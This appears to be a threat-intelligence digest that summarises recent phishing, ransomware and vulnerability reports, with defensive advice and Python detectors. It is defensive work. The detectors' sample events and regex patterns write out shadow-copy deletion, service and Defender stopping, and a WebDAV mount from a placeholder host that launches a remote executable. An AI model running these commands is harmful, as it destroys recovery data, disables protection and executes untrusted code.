At a Glance
Ransomware, Malware & Phishing
- Microsoft Warns of New Phishing Campaign Targeting Corporations via Teams Messages
- Rust-Written 3AM Ransomware: A Sneak Peek into a New Malware Family
- Free Download Manager Site Compromised to Distribute Linux Malware to Users for 3+ Years
- Iranian Nation-State Actors Employ Password Spray Attacks Targeting Multiple Sectors
- NodeStealer Malware Now Targets Facebook Business Accounts on Multiple Browsers
- Retool Falls Victim to SMS-Based Phishing Attack Affecting 27 Cloud Clients
- Bumblebee malware returns in new attacks abusing WebDAV folders
- Auckland transport authority hit by suspected ransomware attack
- BlackCat ransomware hits Azure Storage with Sphynx encryptor
Vulnerabilities
- Zero-Day Security Vulnerability Found in Chrome, Firefox and Other Browsers
- Fortinet Patches High-Severity Vulnerabilities in FortiOS, FortiProxy, FortiWeb Products
- 12,000 Juniper SRX Firewalls and EX Switches Vulnerable to CVE-2023-36845
- GitLab urges users to install security updates for critical pipeline flaw
Ransomware, Malware & Phishing
Microsoft Warns of New Phishing Campaign Targeting Corporations via Teams Messages
Analysis: Microsoft has issued a warning regarding a new phishing campaign orchestrated by an initial access broker known as Storm-0324, also referred to as TA543 and Sagrid. This campaign deviates from the norm by utilizing Microsoft Teams messages as the primary vector for infiltrating corporate networks, moving away from traditional email-based infection methods.
Storm-0324's role in this campaign is that of a payload distributor, facilitating the spread of various malicious payloads, including downloaders, banking trojans, ransomware, and modular toolkits.
Access Point recommends the following:
- Harden Email and Collaboration Tools: Extend phishing detection and attachment/link scanning to Teams messages, not only email. Restrict external (federated) Teams access to trusted domains, or disable it where it is not needed, so that unsolicited chats from outside tenants cannot reach users.
- Expect Traffic Distribution Systems (TDS): Storm-0324 routes victims through TDS such as BlackTDS and Keitaro, which fingerprint and filter visitors to evade security tooling before redirecting them to malicious download sites. Block known TDS infrastructure at the web proxy and treat multi-hop redirects that end in an archive or document download as suspicious.
- Vigilance in Microsoft Teams: Treat Teams messages from external tenants that carry links or attachments with the same suspicion as unsolicited email, and give users a simple way to report them.
- User Education: Educate users about the risks associated with clicking on suspicious links and interacting with potentially harmful attachments.
- Multi-Factor Authentication (MFA): Require multi-factor authentication for accessing sensitive systems and accounts. MFA provides an additional layer of security, reducing the risk of unauthorized access.
- Regular Patching: Ensure that security patches and updates are consistently applied to protect against known vulnerabilities that threat actors may exploit.
MITRE ATT&CK Technique Numbers associated with this campaign include:
- T1566.003 - Phishing: Spearphishing via Service
- T1566 - Phishing
- T1036 - Masquerading
- T1071 - Application Layer Protocol
- T1105 - Ingress Tool Transfer (formerly Remote File Copy)
- T1190 - Exploit Public-Facing Application
- T1563.002 - Remote Service Session Hijacking: RDP Hijacking
- T1059 - Command and Scripting Interpreter
Rust-Written 3AM Ransomware: A Sneak Peek into a New Malware Family
Analysis: A new ransomware strain known as 3AM has surfaced. Its first known use was a single incident in which an unidentified affiliate deployed it after a LockBit deployment on the same network was blocked. Symantec's Threat Hunter Team found that 3AM is written in Rust and appears to be an entirely new malware family rather than a rebrand or variant of a known one.
The 3AM ransomware operates by initially attempting to halt multiple services on the infected computer. It then proceeds to encrypt files and, notably, deletes Volume Shadow Copies (VSS). Encrypted files are marked with the .threeamtime extension. Importantly, the report does not suggest any known affiliations between 3AM and established e-crime groups.
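The behaviour described above (stopping services in a burst, deleting Volume Shadow Copies, renaming files to .threeamtime) is visible in ordinary process-creation and file telemetry before encryption completes. The following detector is an added example written for this page, not code from Symantec or from the 3AM sample; the command-line patterns (vssadmin, wmic, wbadmin, net stop, sc stop) are generic ransomware precursors rather than commands quoted on this page, the events are constructed in a Sysmon-like shape, and the service-stop threshold is an assumed tuning value.

```python
import re
from collections import defaultdict

# Command lines that destroy Volume Shadow Copies or the backup catalog (ATT&CK T1490).
SHADOW_COPY_DELETION = [
    re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b", re.I),
    re.compile(r"\bwmic(?:\.exe)?\b.*\bshadowcopy\s+delete\b", re.I),
    re.compile(r"\bwbadmin(?:\.exe)?\b.*\bdelete\s+catalog\b", re.I),
    re.compile(r"win32_shadowcopy.*\bdelete\b", re.I),
]
# "net stop <svc>" / "sc stop <svc>" (ATT&CK T1489); ransomware stops many services in a burst.
SERVICE_STOP = re.compile(r'(?:^|[\\\s"])(?:net1?|sc)(?:\.exe)?"?\s+stop\s+"?([^"\s]+)', re.I)
SERVICE_STOP_THRESHOLD = 5          # assumed tuning value, not taken from the report
RANSOM_EXTENSION = ".threeamtime"   # extension reported for 3AM


def analyse(events):
    """Return findings {host, technique, detail} for a list of process/file events."""
    findings = []
    stopped = defaultdict(set)     # host -> distinct services stopped
    encrypted = defaultdict(int)   # host -> files carrying the ransom extension
    for e in events:
        if e["type"] == "process":
            cmd = e["cmdline"]
            if any(p.search(cmd) for p in SHADOW_COPY_DELETION):
                findings.append({"host": e["host"], "technique": "T1490", "detail": cmd})
            m = SERVICE_STOP.search(cmd)
            if m:
                stopped[e["host"]].add(m.group(1).lower())
        elif e["type"] == "file" and e["path"].lower().endswith(RANSOM_EXTENSION):
            encrypted[e["host"]] += 1
    for host, services in stopped.items():
        if len(services) >= SERVICE_STOP_THRESHOLD:
            findings.append({"host": host, "technique": "T1489",
                             "detail": f"{len(services)} services stopped: {', '.join(sorted(services))}"})
    for host, count in encrypted.items():
        findings.append({"host": host, "technique": "T1486",
                         "detail": f"{count} files renamed to {RANSOM_EXTENSION}"})
    return findings


# Constructed events in the shape of Sysmon process-creation / file-rename records; not real telemetry.
SAMPLE_EVENTS = [
    {"type": "process", "host": "ws01", "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"type": "process", "host": "ws01", "cmdline": "wbadmin.exe delete catalog -quiet"},
    {"type": "process", "host": "ws01", "cmdline": "net stop MSSQLSERVER /y"},
    {"type": "process", "host": "ws01", "cmdline": "net stop SQLWriter /y"},
    {"type": "process", "host": "ws01", "cmdline": "net stop VeeamBackupSvc /y"},
    {"type": "process", "host": "ws01", "cmdline": "net stop vss /y"},
    {"type": "process", "host": "ws01", "cmdline": "sc.exe stop WinDefend"},
    {"type": "file", "host": "ws01", "path": r"C:\Users\alice\Documents\q3.xlsx.threeamtime"},
    {"type": "file", "host": "ws01", "path": r"C:\Shares\finance\ledger.db.threeamtime"},
    {"type": "process", "host": "ws02", "cmdline": "vssadmin.exe list shadows"},   # benign admin use
    {"type": "process", "host": "ws02", "cmdline": "net stop spooler"},             # one service, no alert
    {"type": "file", "host": "ws02", "path": r"C:\Users\bob\notes.txt"},
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f["host"], f["technique"], f["detail"])
```

The shadow-copy patterns alone are high-fidelity enough to alert on; the service-stop count and the extension count are there to correlate the full sequence on one host, which is what distinguishes a ransomware run from an administrator running a single command.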
Access Point Recommends the following:
- Regular Backup of Critical Files: Ensure that critical files are regularly backed up, and that these backups are stored in a secure and isolated location. This practice can facilitate recovery in case of a ransomware incident.
- Endpoint Security Solutions: Implement advanced endpoint security solutions capable of detecting and preventing malicious activities on individual computers. These solutions play a crucial role in identifying and blocking ransomware threats.
- Protection for Volume Shadow Copies (VSS): Strengthen protections for Volume Shadow Copies to prevent unauthorized deletion or modification. Preserving VSS copies can be invaluable for data recovery.
- Network Monitoring: Employ network monitoring tools to detect unusual traffic patterns or communication with malicious servers. Monitoring network traffic can help identify early signs of a ransomware attack.
- User Account Monitoring: Monitor for unusual user account creations or privilege escalations, as these may indicate an ongoing attack or lateral movement by threat actors.
- Intrusion Detection Systems (IDS): Utilize intrusion detection systems to identify suspicious activities, especially those related to lateral movement or reconnaissance within your network.
MITRE ATT&CK Technique Numbers associated with this campaign include:
- T1566.001 - Phishing: Spearphishing Attachment
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1574.002 - Hijack Execution Flow: DLL Side-Loading
- T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
- T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control
- T1027 - Obfuscated Files or Information
- T1562.001 - Impair Defenses: Disable or Modify Tools
- T1003 - OS Credential Dumping
- T1012 - Query Registry
- T1082 - System Information Discovery
- T1074 - Data Staged
- T1048 - Exfiltration Over Alternative Protocol
- T1489 - Service Stop
- T1490 - Inhibit System Recovery
- T1486 - Data Encrypted for Impact
Free Download Manager Site Compromised to Distribute Linux Malware to Users for 3+ Years
Analysis: A supply chain attack on Linux users, carried out through the Free Download Manager website, distributed malware that went unnoticed for more than three years. Downloads served from the compromised site included a trojanised package that established a reverse shell to an actor-controlled server and deployed a Bash-based stealer on the compromised system. The campaign was active from 2020 to 2022 and is no longer in operation.
The malware utilized in this attack was designed to gather sensitive data, including system information, browsing history, passwords, cryptocurrency wallet files, and credentials for cloud services.
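A trojanised package that ships with the vendor's own name can only be caught by comparing what is on disk against an independently obtained record of what the legitimate build contains. The audit below is an added example written for this page, not code from Kaspersky or from the Free Download Manager project; it uses a dpkg-style md5sums manifest because Free Download Manager is distributed as a .deb, the file names and contents are constructed placeholders, and the manifest is taken from a clean install to stand in for one fetched from the distributor's repository.

```python
import hashlib
import tempfile
from pathlib import Path


def parse_md5sums(manifest):
    """Parse a dpkg-style md5sums manifest ('<md5>  <path relative to />' per line)."""
    expected = {}
    for line in manifest.splitlines():
        if not line.strip():
            continue
        digest, _, rel = line.strip().partition("  ")
        expected[rel] = digest.lower()
    return expected


def build_md5sums(root, rel_paths):
    """Produce a manifest for known-good files (stands in for the distributor's copy)."""
    lines = []
    for rel in rel_paths:
        digest = hashlib.md5((Path(root) / rel).read_bytes()).hexdigest()
        lines.append(f"{digest}  {rel}")
    return "\n".join(lines) + "\n"


def audit_package(root, manifest):
    """Compare files under root with the manifest; report modified, missing and intact files."""
    expected = parse_md5sums(manifest)
    report = {"modified": [], "missing": [], "ok": []}
    for rel, digest in sorted(expected.items()):
        path = Path(root) / rel
        if not path.is_file():
            report["missing"].append(rel)
        elif hashlib.md5(path.read_bytes()).hexdigest() != digest:
            report["modified"].append(rel)
        else:
            report["ok"].append(rel)
    return report


def demo():
    """Constructed scenario: a clean install, a manifest taken from it, then tampering."""
    with tempfile.TemporaryDirectory() as root:
        files = {  # placeholder contents, not real binaries
            "usr/bin/fdm": b"\x7fELF...clean binary placeholder...",
            "usr/lib/fdm/plugin.so": b"\x7fELF...plugin placeholder...",
            "usr/share/doc/fdm/README": b"Free Download Manager\n",
        }
        for rel, content in files.items():
            path = Path(root) / rel
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_bytes(content)
        manifest = build_md5sums(root, files)   # captured while the install was clean
        # Tamper: append a constructed stealer stub to the binary and delete the README.
        with open(Path(root) / "usr/bin/fdm", "ab") as f:
            f.write(b"\n#!/bin/bash\n# constructed malicious appendix\n")
        (Path(root) / "usr/share/doc/fdm/README").unlink()
        return audit_package(root, manifest)


if __name__ == "__main__":
    print(demo())
```

The manifest must come from somewhere the attacker did not control: the md5sums file that dpkg stores locally was itself delivered inside the package, so a backdoored package carries a matching manifest. Compare against the hashes published in the distributor's signed repository metadata (or a copy archived before the compromise window), and treat MD5 here as a change detector rather than a cryptographic guarantee.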
Access Point recommends the following:
- Software Source Vetting: Thoroughly vet the reputation and trustworthiness of software sources, particularly those obtained from third-party download sites. Verify the authenticity and integrity of software downloads.
- Advanced Endpoint Security: Deploy advanced endpoint security solutions capable of detecting and preventing malicious activities on individual computers. These solutions play a critical role in identifying and blocking malware threats.
- System File Monitoring: Monitor system files and directories for any unauthorized changes, especially in critical areas where tampering can have severe consequences.
- Network Traffic Analysis: Employ network traffic analysis tools to identify suspicious communication patterns or connections to malicious servers. Timely detection of unusual traffic can help mitigate threats.
- Intrusion Detection Systems (IDS): Utilize intrusion detection systems to detect anomalies in network traffic and behavior, particularly those indicative of backdoor communication or other malicious activities.
- Software Audits: Conduct periodic audits of installed software to ensure it matches legitimate versions and has not been tampered with. Detecting unauthorized alterations early is crucial for security.
MITRE ATT&CK Technique Numbers associated with this campaign include:
- T1105 - Ingress Tool Transfer
- T1027 - Obfuscated Files or Information
- T1573 - Encrypted Channel
- T1020 - Automated Exfiltration
- T1059 - Command and Scripting Interpreter
- T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification (the malware is reported to modify shortcuts so that its components run at startup)
Iranian Nation-State Actors Employ Password Spray Attacks Targeting Multiple Sectors
Analysis: Between February and July 2023, Peach Sandstorm (formerly tracked as Holmium), a threat actor group associated with the Iranian state, conducted password spray attacks against multiple organizations worldwide. The targets operate primarily in the satellite, defense, and pharmaceutical sectors, which suggests a motive of gathering intelligence in support of Iranian state interests.
Once the threat actors successfully authenticate, they employ a combination of publicly available and custom tools for various activities, including discovery, persistence, lateral movement, and limited data exfiltration.
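A password spray is easy to miss per account (one or two failures per user) and easy to see per source: one address failing against many distinct accounts inside a short window, followed by a success against one of them. The detector below is an added example written for this page, not Microsoft's detection logic; the sign-in records are constructed, the field names are simplified from what an identity provider's sign-in log would carry, and the window and thresholds are assumed tuning values.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(hours=1)        # assumed tuning values, not from the report
MIN_DISTINCT_USERS = 10
MAX_FAILURES_PER_USER = 3


def detect_password_spray(events, window=WINDOW, min_users=MIN_DISTINCT_USERS,
                          max_per_user=MAX_FAILURES_PER_USER):
    """Flag source IPs that fail against many distinct accounts, a few times each, inside one window."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append((datetime.fromisoformat(e["ts"]), e["user"], e["result"]))
    alerts = []
    for ip, items in by_ip.items():
        items.sort()
        failures = [(ts, user) for ts, user, result in items if result == "failure"]
        best, start = None, 0
        for end in range(len(failures)):                      # sliding window over failures
            while failures[end][0] - failures[start][0] > window:
                start += 1
            per_user = Counter(user for _, user in failures[start:end + 1])
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                if best is None or len(per_user) > len(best[2]):
                    best = (failures[start][0], failures[end][0], per_user)
        if best is None:
            continue
        first, last, per_user = best
        # Any sprayed account that later authenticates successfully from the same IP is a likely hit.
        hits = sorted({user for ts, user, result in items
                       if result == "success" and ts >= first and user in per_user})
        alerts.append({"ip": ip, "window_start": first.isoformat(), "window_end": last.isoformat(),
                       "distinct_users": len(per_user), "probable_compromise": hits})
    return alerts


def constructed_logs():
    """Constructed sign-in records (not real telemetry): one spraying IP, one forgetful user."""
    base = datetime(2023, 3, 14, 2, 0)
    logs = [{"ts": (base + timedelta(minutes=3 * i)).isoformat(),
             "user": f"user{i:02d}@example.com", "ip": "203.0.113.5", "result": "failure"}
            for i in range(12)]
    logs.append({"ts": (base + timedelta(minutes=45)).isoformat(),
                 "user": "user07@example.com", "ip": "203.0.113.5", "result": "success"})
    logs += [{"ts": (base + timedelta(minutes=i)).isoformat(),
              "user": "bob@example.com", "ip": "198.51.100.7", "result": "failure"} for i in range(6)]
    logs.append({"ts": (base + timedelta(minutes=7)).isoformat(),
                 "user": "bob@example.com", "ip": "198.51.100.7", "result": "success"})
    return logs


if __name__ == "__main__":
    for alert in detect_password_spray(constructed_logs()):
        print(alert)
```

Keying on the source IP alone is the weak point: a patient actor rotates addresses, so in production also group by user agent, ASN and the specific failure reason (wrong password as opposed to unknown user or blocked sign-in), and keep the window long enough to catch a low-and-slow spray.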
Access Point recommends the following:
- Multi-Factor Authentication (MFA): Implement MFA to add an additional layer of security, mitigating the risk of unauthorized access even if passwords are compromised.
- Password Hygiene: Enforce the use of strong, unique passwords and educate users about the importance of password hygiene. Encourage the use of password managers to generate and securely store complex passwords.
- Patch and Update Management: Promptly apply security patches and updates to address vulnerabilities in software and systems. Timely patching is critical in preventing exploitation of known vulnerabilities.
- Network Monitoring: Utilize network monitoring tools to identify unusual or suspicious patterns of activity, particularly during off-hours. Early detection can help mitigate threats before they escalate.
- Endpoint Detection and Response (EDR): Implement endpoint detection and response solutions to monitor and respond to suspicious activities on endpoints. EDR solutions play a crucial role in threat detection and incident response.
- Cloud Security: Implement robust cloud security measures and regularly monitor for unauthorized access or unusual behavior within cloud environments. Cloud security is paramount as organizations increasingly migrate to cloud platforms.
- Threat Intelligence: Stay informed about emerging threats through reputable threat intelligence sources and share threat information within the security community. Collaborative sharing of threat data enhances collective defense efforts.
MITRE ATT&CK Technique Numbers associated with this campaign include:
- T1110.003 - Brute Force: Password Spraying
- T1056 - Input Capture
- T1003 - Credential Dumping
- T1078 - Valid Accounts
- T1134 - Access Token Manipulation
- T1573 - Encrypted Channel
- T1053 - Scheduled Task/Job
NodeStealer Malware Now Targets Facebook Business Accounts on Multiple Browsers
Analysis: A sustained campaign is targeting Facebook Business accounts through deceptive messages with the aim of harvesting victims' credentials. It uses a variant of the Python-based NodeStealer malware, which can take control of compromised accounts for subsequent malicious activity. The primary targets are individuals in Southern Europe and North America, particularly in the manufacturing, services and technology sectors.
NodeStealer, which initially started as JavaScript malware for stealing cookies and passwords, has evolved to compromise accounts on platforms like Facebook, Gmail, and Outlook. The threat actors behind this campaign are believed to be Vietnamese and have recently resumed their activities, possibly adopting tactics used by other adversaries in the region with similar objectives.
Access Point recommends the following:
- Endpoint Security Solutions: Deploy advanced endpoint security solutions capable of detecting and preventing malicious activities. These solutions play a crucial role in identifying and blocking malware threats.
- Email and Message Filtering: Employ robust email and message filtering mechanisms to identify and block phishing attempts and malicious attachments. Filtering can help prevent malicious content from reaching users' inboxes.
- Multi-Factor Authentication (MFA): Require the use of multi-factor authentication for accessing sensitive accounts and systems. MFA adds an extra layer of security by necessitating additional verification beyond passwords.
- Software Audits: Conduct periodic audits of installed software to ensure it matches legitimate versions and hasn't been tampered with. Detecting unauthorized alterations early is essential for security.
- Network Traffic Analysis: Utilize network traffic analysis tools to identify unusual or suspicious patterns of activity. Monitoring network traffic can help detect and mitigate threats.
- Link Validation: Use tools that can analyze and validate links before they are accessed, especially in messages. This can help prevent users from inadvertently visiting malicious websites.
MITRE ATT&CK Technique Numbers associated with this campaign include:
- T1204 - User Execution
- T1106 - Native API
- T1564.001 - Hidden Files and Directories
- T1053 - Scheduled Task/Job
- T1027 - Obfuscated Files or Information
Retool Falls Victim to SMS-Based Phishing Attack Affecting 27 Cloud Clients
Analysis: Software development company Retool recently disclosed a security breach affecting 27 of its cloud customers. The breach took place on August 27, 2023, and began with a targeted SMS-based social engineering attack. Retool identified the cloud synchronization feature that Google added to Google Authenticator in April 2023 as a factor that amplified the breach: once the attackers controlled the employee's Google account, every synced one-time code was available to them, which effectively reduced multi-factor authentication (MFA) to a single factor.
It is crucial to emphasize that the breach was initiated through a successful SMS phishing attack that impersonated an IT team member. The attackers convincingly tricked an employee into clicking on a seemingly legitimate link, ostensibly to address a payroll-related issue. This led the employee to a fraudulent landing page, where they unknowingly divulged their login credentials.
The attackers then phoned the employee, using what Retool believes was a deepfake of an IT team member's voice, and talked them into handing over an MFA code. That code gave them the employee's Okta account, to which they registered their own device so they could generate further MFA codes, and from there they established an active Google Workspace session on a device they controlled.
Because the employee's Google Authenticator codes were synced to that Google account, the Workspace session gave the attackers every MFA code tied to it, which they used to reach internal admin systems. From there they took over accounts belonging to 27 customers, all in the crypto industry, changed the affected users' email addresses and reset their passwords. One of those customers, Fortress Trust, subsequently reported the theft of roughly $15 million in cryptocurrency.
Access Point recommends the following:
- MFA Monitoring and Security: Regularly monitor and enhance the security of multi-factor authentication (MFA) systems. Ensure that MFA remains a robust layer of defense against unauthorized access.
- Phishing Awareness: Conduct ongoing training and simulations to raise awareness about the dangers of phishing, emphasizing vigilance in recognizing and reporting suspicious messages and links.
- Incident Response Planning: Develop and maintain a robust incident response plan to swiftly mitigate the impact of security breaches. This plan should include procedures for handling social engineering attacks and unauthorized access.
- Authentication System Audits: Periodically audit and assess the security of authentication systems, especially those involving cloud synchronization features. Ensure that security controls are in place to prevent compromise.
MITRE ATT&CK Technique Numbers associated with this campaign include:
- T1566.002 - Phishing: Spearphishing Link (delivered by SMS)
- T1566.004 - Phishing: Spearphishing Voice (the deepfaked call)
- T1111 - Multi-Factor Authentication Interception
- T1078 - Valid Accounts
Bumblebee malware returns in new attacks abusing WebDAV folders
Analysis: The malware loader known as 'Bumblebee' has reemerged after a two-month hiatus with a fresh campaign whose distribution is built around abuse of 4shared WebDAV services. WebDAV, an extension of HTTP, allows remote authoring operations, enabling clients to create, access, update, and delete web server content. Starting on September 7, 2023, the latest Bumblebee campaign uses 4shared WebDAV services to disseminate the loader, conduct the attack sequence, and carry out post-infection activities. By riding on the legitimate 4shared platform, Bumblebee operators evade blocklists and keep their infrastructure highly available, while the WebDAV protocol gives them several ways to bypass behavioral detection systems, an advantage in both distribution and payload management.
The current Bumblebee campaign relies on malspam emails camouflaged as scans, invoices, and notifications to lure recipients into downloading malicious attachments. These attachments mainly consist of Windows shortcut LNK files, with some ZIP archives containing LNK files, indicating ongoing experimentation by Bumblebee operators to refine their tactics. When the LNK file is opened, a series of commands are executed on the victim's machine. This includes mounting a WebDAV folder on a network drive using hardcoded credentials for a 4shared storage account. The 4shared platform permits users to store and access files through WebDAV, FTP, and SFTP, although it was previously listed in the US government's 2016 Notorious Markets report for hosting copyrighted content.
An updated version of the Bumblebee malware loader has been identified in this campaign. It has shifted from using the WebSocket protocol to TCP for command and control server (C2) communications. Additionally, the new loader incorporates a domain generation algorithm (DGA) that generates 100 domains on the ".life" top-level domain (TLD) space upon execution. This DGA implementation complicates efforts to map Bumblebee's infrastructure, block its domains, and disrupt its operations, making it more challenging to implement preventive measures against the malware loader.
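The infection chain above has a narrow, loggable choke point: a command line that mounts a WebDAV share (a `net use` with an HTTP(S) target or an `@SSL`/`DavWWWRoot` UNC path, credentials included) followed by execution from that mount. The detector below is an added example written for this page, not Intel471's or any vendor's detection content; the events are constructed, webdav.example.net stands in for the actual storage host, and the credential values are placeholders.

```python
import re

WEBDAV_URL = re.compile(r"""https?://[^\s"']+""", re.I)
# \\host@SSL\..., \\host@443\... and \\host\DavWWWRoot\... are the Windows WebDAV UNC forms.
WEBDAV_UNC = re.compile(r"""\\\\[^\\\s"']+(?:@SSL|@\d+|\\DavWWWRoot)(?:\\[^\s"']*)?""", re.I)
NET_USE = re.compile(r"\bnet1?(?:\.exe)?\s+use\s+([a-z]:)\s+(\S+)(.*)", re.I)
CREDENTIALS = re.compile(r"/user:\S+\s+\S+", re.I)   # /user:<name> <password> on the command line


def detect_webdav_abuse(events):
    """Flag WebDAV mounts and later execution from WebDAV paths, per host, in event order."""
    mounted = {}   # (host, drive letter) -> mounted WebDAV target
    alerts = []
    for e in events:
        host, cmd = e["host"], e["cmdline"]
        reasons = []
        m = NET_USE.search(cmd)
        if m:
            drive, target, rest = m.group(1).upper(), m.group(2), m.group(3)
            if WEBDAV_URL.fullmatch(target) or WEBDAV_UNC.fullmatch(target):
                mounted[(host, drive)] = target
                reasons.append(f"WebDAV share mounted as {drive}")
                if CREDENTIALS.search(rest):
                    reasons.append("credentials hard-coded in command line")
        elif WEBDAV_UNC.search(cmd):
            reasons.append("execution referencing a WebDAV UNC path")
        for (h, drive), target in mounted.items():
            if h == host and re.search(re.escape(drive) + r"\\", cmd, re.I):
                reasons.append(f"reference to WebDAV-mapped drive {drive} ({target})")
        if reasons:
            alerts.append({"host": host, "cmdline": cmd, "reasons": reasons})
    return alerts


# Constructed process-creation events; the hostname, drive letters and credentials are placeholders.
SAMPLE_EVENTS = [
    {"host": "ws03", "parent": "explorer.exe",   # what an opened LNK might launch
     "cmdline": r"cmd.exe /c net use M: https://webdav.example.net/files /user:acct@example.net Passw0rd & start M:\update.exe"},
    {"host": "ws03", "parent": "cmd.exe",
     "cmdline": r"rundll32.exe \\webdav.example.net@SSL\DavWWWRoot\files\update.dll,Start"},
    {"host": "ws04", "parent": "explorer.exe",   # ordinary SMB mapping, must not alert
     "cmdline": r"net use Z: \\fileserver.corp.example\finance"},
    {"host": "ws04", "parent": "cmd.exe",
     "cmdline": r"cmd.exe /c Z:\month_end.bat"},
]

if __name__ == "__main__":
    for alert in detect_webdav_abuse(SAMPLE_EVENTS):
        print(alert["host"], alert["reasons"])
```

Pair this with the network side: the WebClient service on the workstation is what speaks WebDAV, so outbound HTTP(S) from svchost.exe hosting WebClient to a file-sharing service, right after an Outlook child process opened an attachment, is the same event seen from the proxy.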
Access Point recommends the following:
- Email Security and User Training: Implement robust email filtering solutions to identify and block suspicious emails. Continuously educate users to recognize and avoid opening attachments or clicking on links in unsolicited or suspicious emails.
- Network and Endpoint Security: Deploy strong network and endpoint security solutions capable of detecting and blocking malicious attachments and web connections. These solutions are pivotal in identifying and mitigating threats at various stages of an attack.
- Monitoring for WebDAV Activity: Regularly monitor network traffic for unusual WebDAV activity and network drive mounting. Detection of such activity can provide early indicators of potential threats and enable a swift response.
- Threat Intelligence and Patching: Stay informed about emerging threats by maintaining up-to-date threat intelligence. Promptly apply security patches and measures recommended by trusted sources to address known vulnerabilities.
MITRE ATT&CK Technique Numbers associated with this campaign include:
- T1566.001 - Phishing: Spearphishing Attachment
- T1204.002 - User Execution: Malicious File
- T1059.003 - Command and Scripting Interpreter: Windows Command Shell
- T1105 - Ingress Tool Transfer
- T1140 - Deobfuscate/Decode Files or Information
- T1036.008 - Masquerading: Masquerade File Type
- T1568.002 - Dynamic Resolution: Domain Generation Algorithms
Auckland transport authority hit by suspected ransomware attack
Analysis: The Auckland Transport (AT) transportation authority in New Zealand is currently dealing with a significant outage resulting from a cyber incident, affecting a wide range of customer services. AT is the government-owned entity responsible for overseeing public transport, including ferries, buses, trains, and infrastructure development.
The incident has had a notable impact on AT's HOP services, which include the integrated ticketing and fares system. Various HOP card services, including top-ups, have been affected. Despite these disruptions, AT has assured passengers that they can still travel, even if their HOP cards cannot be immediately topped up. AT has provided an update stating that they suspect ransomware involvement in the incident, but investigations are still ongoing.
Passengers with empty HOP cards are being offered leniency, and the overall travel using AT's services remains unaffected. AT expects that its website and HOP services may return to normal early next week and has requested patience during the gradual restoration process. While concerns about potential data exposure exist due to the nature of ransomware attacks, AT has stated that they believe the incident is confined to one system segment, and no personal or financial data has been accessed.
Access Point recommends the following:
- Robust Cybersecurity Measures: Ensure the implementation of robust cybersecurity measures, including regular data backups, continuous network monitoring, and updated security protocols to safeguard against cyber threats.
- Employee Education: Educate employees and users about phishing threats and promote cyber hygiene practices to mitigate the risk of falling victim to such attacks.
- Incident Response Plan: Establish a comprehensive response plan for handling cyber incidents. This plan should encompass communication strategies, backup systems, and a well-defined incident response team.
- Security Audits and Vulnerability Assessments: Conduct regular security audits and vulnerability assessments to identify and address potential weaknesses in the organization's cybersecurity infrastructure.
MITRE ATT&CK Technique Numbers associated with this campaign include:
- T1078 - Valid Accounts
- T1486 - Data Encrypted for Impact
- T1490 - Inhibit System Recovery
- T1565 - Data Manipulation
BlackCat ransomware hits Azure Storage with Sphynx encryptor
Analysis: The BlackCat (ALPHV) ransomware gang has evolved its tactics, now employing stolen Microsoft accounts and a new encryptor called Sphynx to target Azure cloud storage. During a breach investigation, Sophos X-Ops incident responders discovered that the attackers leveraged a new variant of Sphynx, incorporating support for custom credentials.
The attackers gained unauthorized access to a Sophos Central account, disabled Tamper Protection, and modified security policies using a stolen One-Time Password (OTP) acquired from the victim's LastPass vault through the LastPass Chrome extension. Subsequently, they encrypted the victim's systems and remote Azure cloud storage, appending the .zk09cvt extension to locked files. In total, the ransomware operators successfully encrypted 39 Azure Storage accounts. They accessed the victim's Azure portal using a stolen Azure key, granting them entry to the targeted storage accounts. The keys were injected into the ransomware binary after being encoded with Base64.
The attackers also utilized various Remote Monitoring and Management (RMM) tools such as AnyDesk, Splashtop, and Atera throughout the intrusion. The Sphynx variant, discovered by Sophos in March 2023, was found to embed the Remcom hacking tool and the Impacket networking framework, enabling lateral movement across compromised networks.
BlackCat emerged in November 2021 and is widely believed to be a rebrand of DarkSide/BlackMatter, the operation behind the May 2021 Colonial Pipeline attack. The group has consistently targeted global enterprises with refined and sophisticated tactics, has adopted new extortion methods, and introduced a data leak API to streamline the dissemination of stolen data. Recently, an affiliate of the gang claimed responsibility for an attack on MGM Resorts, encrypting over 100 ESXi hypervisors after the company took down its internal infrastructure and refused ransom negotiations. In April 2022 the FBI issued a warning attributing to the group successful breaches of over 60 entities worldwide between November 2021 and March 2022.
Access Point recommends the following:
- Multi-Factor Authentication (MFA): Implement MFA to add an extra layer of security, especially for critical accounts and systems.
- Advanced Endpoint Security: Employ advanced endpoint security solutions to detect and prevent malicious activities on individual computers.
- Email and Message Filtering: Utilize email and message filtering to identify and block phishing attempts and malicious attachments.
- Software Audits: Conduct periodic audits of installed software to ensure it matches legitimate versions and hasn't been tampered with.
- Network Traffic Analysis: Use network traffic analysis tools to identify unusual or suspicious patterns of activity.
- Cloud Security: Implement robust cloud security measures and monitor for unauthorized access or unusual behavior in cloud environments.
MITRE ATT&CK Technique Numbers associated with this campaign include:
- T1078 - Valid Accounts
- T1555.005 - Credentials from Password Stores: Password Managers
- T1562.001 - Impair Defenses: Disable or Modify Tools
- T1219 - Remote Access Software
- T1106 - Native API
- T1564.001 - Hide Artifacts: Hidden Files and Directories
- T1053 - Scheduled Task/Job
- T1027 - Obfuscated Files or Information
- T1573.001 - Encrypted Channel: Symmetric Cryptography
- T1059 - Command and Scripting Interpreter
- T1486 - Data Encrypted for Impact
Vulnerabilities
Zero-Day Security Vulnerability Found in Chrome, Firefox and Other Browsers
Analysis: A zero-day vulnerability, tracked as CVE-2023-4863, affects major web browsers including Google Chrome, Mozilla's Firefox and Thunderbird, Microsoft Edge, Brave, and the Tor Browser. The flaw is a heap buffer overflow in libwebp, the widely used codec library for rendering WebP images: a crafted image can corrupt memory and let attackers execute code, potentially leading to data theft or malware infection on the victim's machine.
